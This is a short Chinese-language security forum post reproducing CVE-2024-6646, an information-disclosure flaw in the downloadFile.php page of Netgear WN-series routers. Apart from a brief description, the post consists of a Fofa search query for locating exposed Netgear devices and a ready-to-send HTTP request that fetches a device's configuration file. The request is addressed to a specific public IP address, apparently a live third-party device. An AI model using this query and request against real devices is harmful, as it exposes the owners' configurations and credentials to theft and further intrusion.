CVE-2024-6646 漏洞复现-网络安全论坛-网络安全-阻击者联盟

CVE-2024-6646 漏洞复现

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
430

Netgear Web 界面 downloadFile.php 信息泄露漏洞

Netgear的WN系列产品存在一个漏洞,该漏洞存在于Web界面的某个未知功能中,影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件,攻击者可以获取敏感信息。该攻击可能远程发起。

a3abf596cee7fad4884bf35660104018

 

Fofa语句

title=="Netgear"

b0427c19e8940d1e6757c59b8050759b

 

POC:

GET /downloadFile.php?file=config HTTP/1.1
Host: 217.155.60.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

 

1
1人已评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面